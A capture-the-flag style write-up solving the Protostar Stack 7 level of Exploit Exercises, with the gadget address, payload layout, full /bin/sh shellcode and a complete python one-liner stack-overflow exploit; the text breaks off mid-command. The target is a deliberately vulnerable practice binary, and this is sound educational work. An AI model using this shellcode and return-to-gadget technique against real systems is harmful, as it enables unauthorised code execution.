Exploit Exercises - Protostar Stack 7
In this level the app checks the return address and refuses anything that starts with 0xbxxxxxxx, so returning straight into the stack is rejected. To get around that I return into a pop; pop; ret gadget inside the binary instead (its address is in the 0x0804xxxx range and passes the check): the gadget pops two junk words and then rets into the stack address stored right after them.

Found pop pop ret at: 0x08048492

The payload layout is (the stack address is the one recovered from the PoC below):

    | "A" * 80 | pop pop ret address | 8 bytes junk | stack address | NOP sled to absorb address shifting | shellcode |

This is the shellcode:

    \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

Loading the PoC into gdb, setting a breakpoint and inspecting the stack, I found the NOP sled in front of the shellcode starting at 0xbffff698.

OK, build the PoC (the "C"*8 are the two junk words consumed by the pops, followed by the stack address 0xbffff698 as the final return target):

    (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'; cat)

And run it:

    (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"